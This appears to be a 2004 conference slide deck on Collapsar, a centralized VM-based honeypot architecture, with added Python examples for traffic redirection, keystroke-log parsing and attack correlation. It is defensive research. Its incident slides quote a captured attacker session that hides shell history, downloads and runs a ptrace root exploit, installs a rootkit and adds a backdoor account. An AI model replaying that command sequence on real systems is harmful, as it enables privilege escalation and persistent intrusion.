Collapsar: A VM-Based Architecture for Network Attack Detention Center
Xuxian Jiang, Dongyan Xu
Department of Computer Sciences
Center for Education and Research in Information Assurance and Security (CERIAS)
Purdue University
USENIX Security 2004
Outline
- Motivation
- Collapsar architecture and features
- Collapsar design, implementation, and performance
- Collapsar deployment and real-world incidents
- Conclusion and on-going work
Motivation
- Need for network attack containment and monitoring
  - Worm outbreaks (MSBlaster, Sasser, ...)
  - Debian project servers hacked (Nov. 2003)
  - PlanetLab nodes compromised (Dec. 2003)
  - And more
Motivation
- Promise of honeypots
  - Providing insights into intruders' motivations, tactics, and tools
  - Highly concentrated datasets w/ low noise
  - Low false-positive and false-negative rate
  - Discovering unknown vulnerabilities/exploitations
    - Example: CERT advisory CA-2002-01 (Solaris CDE subprocess control daemon, dtspcd)
Current Honeypot Operation
- Individual honeypots
  - Limited local view of attacks
- Federation of distributed honeypots
  - Deploying honeypots in different networks
  - Exchanging logs and alerts
- Problems
  - Difficulties in distributed management
  - Lack of honeypot expertise
  - Inconsistency in security and management policies
    - Example: log format, sharing policy, exchange frequency
Our Solution: Collapsar
- Based on the HoneyFarm idea of Lance Spitzner
- Achieving two (seemingly) conflicting goals
  - Distributed honeypot presence
  - Centralized honeypot operation
- Key ideas
  - Leveraging unused IP addresses in each network
  - Diverting corresponding traffic to a "detention" center (transparently)
  - Creating VM-based honeypots in the center
VM-based Honeypot
(diagram slide)
Collapsar Architecture
(diagram; labels: Attacker; three Production Networks, each with a Redirector; Collapsar Center containing the Front-End, the virtual honeypots, a Correlation Engine, and a Management Station)
Comparison with Current Approaches
- Overlay-based approach (e.g., NetBait, Domino overlay)
  - Honeypots deployed in different sites
  - Logs aggregated from distributed honeypots
  - Data mining performed on aggregated log information
- Key difference: where the attacks take place (on-site vs. off-site)
Comparison with Current Approaches
- Sinkhole networking approach (e.g., iSink)
  - "Dark" space to monitor Internet abnormality and commotion (e.g., MSBlaster worms)
  - Limited interaction for better scalability
- Key difference: contiguous large address blocks (vs. scattered addresses)
Comparison with Current Approaches
- Low-interaction approach (e.g., honeyd, iSink)
  - Highly scalable deployment
  - Low security risks
- Key difference: emulated services (vs. real things)
  - Less effective to reveal unknown vulnerabilities
  - Less effective to capture 0-day worms
Collapsar Design
- Functional components
  - Redirector
  - Collapsar Front-End
  - Virtual honeypots
- Assurance modules
  - Logging module
  - Tarpitting module
  - Correlation module
Functional Components: Redirector
- Running in each participating network
- Capturing traffic toward unused IP addresses
- Redirecting to Collapsar Front-End
- Two implementation options
  - Proxy-ARP approach
    - Longer latency
    - Minimum change to network infrastructure
  - GRE (Generic Routing Encapsulation) approach
    - Lower latency
    - Requiring router re-configuration
    - Missing attack traffic from inside a domain
Functional Components: Collapsar Front-End
- Dispatching incoming traffic to different honeypots
  - Transparent bridging
- Mitigating security risks
  - Transparent firewalling
  - Packet re-writing
- Assurance module plug-in
  - Logging modules
  - Tarpitting modules
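The Front-End's two jobs on this slide, transparent dispatch by address rewriting and risk mitigation for traffic leaving a honeypot, can be shown in a small simulation. The following Python is an added example written for this page, not code from the Collapsar project; the address plan (RFC 5737 documentation prefixes mapped to private honeypot addresses), the `Packet`/`FrontEnd` names and the per-honeypot budget of five new outbound connections are all assumptions of the example, standing in for the firewalling and tarpitting the slide mentions.

```python
import ipaddress
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed address plan for the example (documentation prefixes, not the
# paper's deployment): unused addresses in participating production networks
# are mapped to honeypot VMs on the center's private network.
UNUSED_TO_HONEYPOT = {
    "192.0.2.10": "10.0.0.11",     # production network A, unused -> honeypot VM 1
    "192.0.2.11": "10.0.0.12",     # production network A, unused -> honeypot VM 2
    "198.51.100.7": "10.0.0.13",   # production network B, unused -> honeypot VM 3
}
HONEYPOT_TO_UNUSED = {hp: pub for pub, hp in UNUSED_TO_HONEYPOT.items()}


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    dport: int
    syn: bool = False   # True for the first packet of a new TCP connection


@dataclass
class FrontEnd:
    """Transparent bridge: rewrites addresses both ways and enforces an
    outbound new-connection budget per honeypot (a simple tarpitting policy;
    the limit value is an assumption of this example)."""
    max_outbound_connections: int = 5
    outbound_connections: dict = field(default_factory=lambda: defaultdict(int))
    dropped: list = field(default_factory=list)

    def inbound(self, pkt: Packet):
        """Redirected traffic arriving for an unused address: map it to the honeypot."""
        honeypot = UNUSED_TO_HONEYPOT.get(pkt.dst)
        if honeypot is None:
            self.dropped.append(("inbound", pkt))
            return None   # not one of the monitored addresses
        return Packet(pkt.src, honeypot, pkt.dport, pkt.syn)

    def outbound(self, pkt: Packet):
        """Traffic leaving a honeypot: restore its public address, but cap the
        number of new connections so a compromised honeypot cannot be turned
        against third parties. Packets of already-admitted connections pass."""
        public = HONEYPOT_TO_UNUSED.get(pkt.src)
        if public is None:
            self.dropped.append(("outbound", pkt))
            return None
        if pkt.syn:
            self.outbound_connections[pkt.src] += 1
            if self.outbound_connections[pkt.src] > self.max_outbound_connections:
                self.dropped.append(("contained", pkt))
                return None
        return Packet(public, pkt.dst, pkt.dport, pkt.syn)


def check_address_plan(mapping=UNUSED_TO_HONEYPOT):
    """Sanity-checks a redirector mapping: every key and value is a valid IPv4
    address and no two unused addresses share one honeypot."""
    for pub, hp in mapping.items():
        ipaddress.IPv4Address(pub)
        ipaddress.IPv4Address(hp)
    return len(set(mapping.values())) == len(mapping)


if __name__ == "__main__":
    fe = FrontEnd()
    print(fe.inbound(Packet("203.0.113.5", "192.0.2.10", 80, syn=True)))
    for _ in range(7):
        fe.outbound(Packet("10.0.0.11", "203.0.113.9", 445, syn=True))
    print(len(fe.dropped), "packets dropped")
```

The inbound path is a pure lookup, which is what makes the redirection transparent to the attacker: the honeypot answers from the public address it was reached on. The outbound budget is deliberately counted on new connections only, so an established session (the attacker's own shell) keeps working while a scan or worm launched from the honeypot is cut off.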
Functional Components: Virtual Honeypots
- VM-based high-interaction honeypots
  - VMware
  - Enhanced User-Mode Linux (UML)
- Commodity OS and popular services
  - Linux, Windows, Solaris, FreeBSD
  - Apache, Samba, sendmail, named
- Capability of forensic analysis
  - System image snapshot / restoration
Assurance Modules
- Logging module
  - Traffic logging (e.g., tcpdump, snort); where: Front-End and honeypots
  - Keystroke logging (e.g., sebek); where: honeypots
- Tarpitting module (e.g., snort-inline)
  - Mitigating security risks; where: Front-End
- Correlation module
  - Mining and correlation
Performance Measurement
- Measurement set-up
  (diagram; hosts: Dell PowerEdge Server (2.6GHz Xeon/2GB Memory), Dell Desktop PC (1.8GHz Pentium 4/768MB Memory); labels: Collapsar Center, A, H, VMware or UML, Redirector, Front-End)
- Metrics
  - TCP throughput, measured with Nock (http://www.cs.wisc.edu/~zandy/p/nock)
  - ICMP latency
Measurement Results
(plots: TCP throughput; ICMP latency)
Collapsar Deployment
- Deployed in a local environment for a two-month period in 2003
- Traffic redirected from five networks
  - Three wired LANs
  - One wireless LAN
  - One DSL network
- ~40 honeypots analyzed so far
  - Internet worms (MSBlaster, Enbiei, Nachi)
  - Interactive intrusions (Apache, Samba)
  - OS: Windows, Linux, Solaris, FreeBSD
Incident: Apache Honeypot/VMware
- Vulnerabilities
  - Vul 1: Apache (CERT® CA-2002-17)
  - Vul 2: Ptrace (CERT® VU-6288429)
- Time-line
  - Deployed: 23:44:03pm, 11/24/03
  - Compromised: 09:33:55am, 11/25/03
- Attack monitoring
  - Detailed log: http://www.cs.purdue.edu/homes/jiangx/collapsar
Keystroke log:
[2003-11-25 09:33:55 aaa.bb.c.126 7817 sh 48]export HISTFILE=/dev/null; echo; echo ' >>>> GAME OVER! Hackerz Win ;) <<<<'; echo; echo; echo "****** I AM IN '`hostname -f`' ******"; echo; if [ -r /etc/redhat-release ]; then echo `cat /etc/redhat-release`; elif [ -r /etc/suse-release ]; then echo SuSe `cat /etc/suse-release`; elif [ -r /etc/slackware-version ]; then echo Slackware `cat /etc/slackware-version`; fi; uname -a; id; echo
[2003-11-25 09:34:01 aaa.bb.c.126 7817 sh 48]cd /tmp
[2003-11-25 09:34:07 aaa.bb.c.126 7817 sh 48]wget http://xxxxxxxxxxxxxxxxxxxxx.xx/0304-exploits/ptrace-kmod.c;gcc ptrace-kmod.c -o p;./p
1. Gaining a regular account: apache
2. Escalating to the root privilege
Incident: Apache Honeypot/VMware
[2003-11-25 09:35:46 aaa.bb.c.126 7838 sh 0]wget http://xxxxxxx.xx.xx/vip/xxxxxx/shv4.tar.gz;tar -xzf shv4.tar.gz;cd shv4;./setup rooter 1985
[2003-11-25 09:36:16 aaa.bb.c.126 8009 xntps 0]SSH-1.5-PuTTY-Release-0.53b
[2003-11-25 09:36:57 aaa.bb.c.126 8009 xntps 0]cd /home;adduser ftpd;su ftpd
[2003-11-25 09:37:00 aaa.bb.c.126 8009 xntps 0]cd ftpd;mkdir .logs;cd .logs
[2003-11-25 09:37:04 aaa.bb.c.126 8009 xntps 0]wget http://xxxxxxx.xxx/archive/v1.2/iroffer1.2b22.tgz;tar -zvxf iroffer1.2b22.tgz;cd iroffer1.2b22;./Configure;make
[2003-11-25 09:37:50 aaa.bb.c.126 8009 xntps 0]mv iroffer syst
[2003-11-25 09:37:52 aaa.bb.c.126 8009 xntps 0]pico rpm
[2003-11-25 09:38:01 aaa.bb.c.126 8009 xntps 0]./syst -b rpm/dev/null &
3. Installing a set of backdoors
4. Adding the ftp user and installing an IRC-based ftp server
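The four numbered phases above are read off the keystroke log by hand; the same reading can be automated from the log format the slides show. The following Python is an added example for this page, not the authors' tooling: it assumes the line layout `[date time src-ip pid process uid]command` seen above, treats a jump from a non-root uid to uid 0 for one source as the escalation step, and matches a few command-level indicators. The sample lines are constructed for the example, with documentation IPs and placeholder hosts rather than the incident's values.

```python
import re
from dataclasses import dataclass

# Log line layout as seen on the slide: "[date time src-ip pid process uid]command".
# The layout and the field meanings are assumed from the shown lines.
LINE_RE = re.compile(
    r"^\[(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<src>\S+) (?P<pid>\d+) "
    r"(?P<proc>\S+) (?P<uid>\d+)\](?P<cmd>.*)$"
)

# Constructed sample, modelled on the incident but with documentation IPs and
# placeholder hosts (not the paper's data).
SAMPLE_LOG = """\
[2003-11-25 09:33:55 203.0.113.126 7817 sh 48]export HISTFILE=/dev/null; uname -a; id
[2003-11-25 09:34:01 203.0.113.126 7817 sh 48]cd /tmp
[2003-11-25 09:34:07 203.0.113.126 7817 sh 48]wget http://host.invalid/ptrace-kmod.c;gcc ptrace-kmod.c -o p;./p
[2003-11-25 09:35:46 203.0.113.126 7838 sh 0]wget http://host.invalid/shv4.tar.gz;tar -xzf shv4.tar.gz
[2003-11-25 09:36:57 203.0.113.126 8009 xntps 0]cd /home;adduser ftpd;su ftpd
"""


@dataclass
class KeystrokeEvent:
    ts: str
    src: str
    pid: int
    proc: str
    uid: int
    cmd: str


def parse_keystroke_log(text):
    """Parses every non-empty line; raises on a line that does not fit the layout
    so that a logger format change is noticed rather than silently skipped."""
    events = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        m = LINE_RE.match(raw)
        if not m:
            raise ValueError(f"unparseable keystroke line: {raw!r}")
        g = m.groupdict()
        events.append(KeystrokeEvent(g["ts"], g["src"], int(g["pid"]),
                                     g["proc"], int(g["uid"]), g["cmd"]))
    return events


# Command-level indicators; each is a regex over the captured command text.
INDICATORS = [
    ("anti-forensics", re.compile(r"HISTFILE=/dev/null")),
    ("download", re.compile(r"\b(?:wget|curl)\b")),
    ("compile", re.compile(r"\bgcc\b")),
    ("account-creation", re.compile(r"\b(?:adduser|useradd)\b")),
]


def reconstruct_phases(events):
    """Returns (timestamp, finding, detail) tuples in log order. A change from a
    non-root uid to uid 0 for the same source is reported as privilege
    escalation; everything else is indicator matching on the command text."""
    findings = []
    last_uid = {}
    for ev in events:
        prev = last_uid.get(ev.src)
        if prev is not None and prev != 0 and ev.uid == 0:
            findings.append((ev.ts, "privilege-escalation",
                             f"uid {prev} -> 0 (pid {ev.pid}, {ev.proc})"))
        last_uid[ev.src] = ev.uid
        for name, pattern in INDICATORS:
            if pattern.search(ev.cmd):
                findings.append((ev.ts, name, ev.cmd[:60]))
    return findings


if __name__ == "__main__":
    for ts, kind, detail in reconstruct_phases(parse_keystroke_log(SAMPLE_LOG)):
        print(ts, kind.ljust(22), detail)
```

The uid field does the most work here: because the honeypot runs a real Apache, the first session arrives as the web server's user, and the switch to uid 0 in a new shell a minute later is visible without understanding the exploit at all. The indicators are secondary and will need tuning per honeypot, which is why they sit in a table rather than in the parser.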
Incident: Apache Honeypot/VMware
Incident: Windows XP Honeypot/VMware
- Vulnerability: RPC DCOM Vul. (Microsoft Security Bulletin MS03-026)
- Time-line
  - Deployed: 22:10:00pm, 11/26/03
  - MSBlaster: 00:36:47am, 11/27/03
  - Enbiei: 01:48:57am, 11/27/03
  - Nachi: 07:03:55am, 11/27/03
Log Correlation: Stepping Stone
- iii.jjj.kkk.11 compromised a honeypot & installed a rootkit, which contained an ssh backdoor
- xx.yyy.zzz.3 connected to the ssh backdoor using the same passwd
Log Correlation: Network Scanning
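Both correlation slides rely on the center seeing every honeypot's logs in one place: the stepping-stone case links two sources through a backdoor credential on one honeypot, and the scanning case links one source through touches on many honeypots. The Python below is an added example for this page, not the Collapsar correlation engine; the event records are constructed and normalised (documentation IPs, made-up honeypot names), `cred` is an opaque token standing in for the captured backdoor password, and the three-target / five-minute scan threshold is an assumption of the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

TS_FMT = "%Y-%m-%d %H:%M:%S"

# Constructed, normalised events from several honeypots (not the paper's data).
# "cred" is an opaque token for the backdoor password seen by the keystroke
# logger at install time and again at login; it stands in for the real value.
EVENTS = [
    {"ts": "2003-11-25 09:35:46", "honeypot": "hp-apache-1", "src": "203.0.113.11", "kind": "backdoor-installed", "cred": "tok-A1"},
    {"ts": "2003-11-25 09:36:16", "honeypot": "hp-apache-1", "src": "203.0.113.11", "kind": "backdoor-login", "cred": "tok-A1"},
    {"ts": "2003-11-25 13:02:09", "honeypot": "hp-apache-1", "src": "198.51.100.3", "kind": "backdoor-login", "cred": "tok-A1"},
    {"ts": "2003-11-25 13:40:00", "honeypot": "hp-apache-1", "src": "198.51.100.3", "kind": "backdoor-login", "cred": "tok-zz"},  # unknown credential: no link
    {"ts": "2003-11-27 00:30:00", "honeypot": "hp-xp-1", "src": "192.0.2.77", "kind": "connect", "dport": 135},
    {"ts": "2003-11-27 00:30:12", "honeypot": "hp-xp-2", "src": "192.0.2.77", "kind": "connect", "dport": 135},
    {"ts": "2003-11-27 00:31:05", "honeypot": "hp-linux-1", "src": "192.0.2.77", "kind": "connect", "dport": 135},
    {"ts": "2003-11-27 00:50:00", "honeypot": "hp-bsd-1", "src": "192.0.2.77", "kind": "connect", "dport": 135},
    {"ts": "2003-11-27 00:31:30", "honeypot": "hp-apache-1", "src": "198.51.100.3", "kind": "connect", "dport": 22},
]


def stepping_stones(events):
    """Links the installer of a backdoor to later users of the same credential
    on the same honeypot. Returns a set of (installer_src, later_src, honeypot)."""
    installer_by_backdoor = {}
    links = set()
    for ev in sorted(events, key=lambda e: e["ts"]):   # ISO timestamps sort as text
        key = (ev["honeypot"], ev.get("cred"))
        if ev["kind"] == "backdoor-installed":
            installer_by_backdoor[key] = ev["src"]
        elif ev["kind"] == "backdoor-login":
            installer = installer_by_backdoor.get(key)
            if installer is not None and installer != ev["src"]:
                links.add((installer, ev["src"], ev["honeypot"]))
    return links


def scanners(events, min_targets=3, window=timedelta(minutes=5)):
    """Flags a source that touches at least min_targets distinct honeypots
    within any window of the given length. Returns {src: honeypots seen in
    the first such window}."""
    hits = defaultdict(list)
    for ev in events:
        if ev["kind"] == "connect":
            hits[ev["src"]].append((datetime.strptime(ev["ts"], TS_FMT), ev["honeypot"]))
    flagged = {}
    for src, seen in hits.items():
        seen.sort()
        for i, (start, _) in enumerate(seen):
            targets = {hp for t, hp in seen[i:] if t - start <= window}
            if len(targets) >= min_targets:
                flagged[src] = targets
                break
    return flagged


if __name__ == "__main__":
    print("stepping stones:", stepping_stones(EVENTS))
    print("scanners:", scanners(EVENTS))
```

Neither detection is possible from a single honeypot's view alone: the scan only stands out because honeypots from several production networks report to one place, and the stepping-stone link only exists because the install and the later login were both captured and can be joined on the credential.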
Conclusions
- A new architecture for attack containment and monitoring
  - Distributed presence and centralized operation of honeypots
  - Good potential in attack correlation and log mining
- Unique features
  - Aggregation of scattered unused IP addresses
  - Off-site (relative to participating networks) attack occurrences and monitoring
  - Real services for unknown vulnerability revelation
On-going Work
- Integration into trusted server architectures (SODA and Poly2)
- On-demand honeypot customization
- Collapsar center federation
- Scalability
- Testbed for worm containment (coming soon)
Thank you.
For more information:
Email: {dxu, jiangx}@cs.purdue.edu
URL: www.cs.purdue.edu/~dxu
Google: “Purdue Collapsar friends”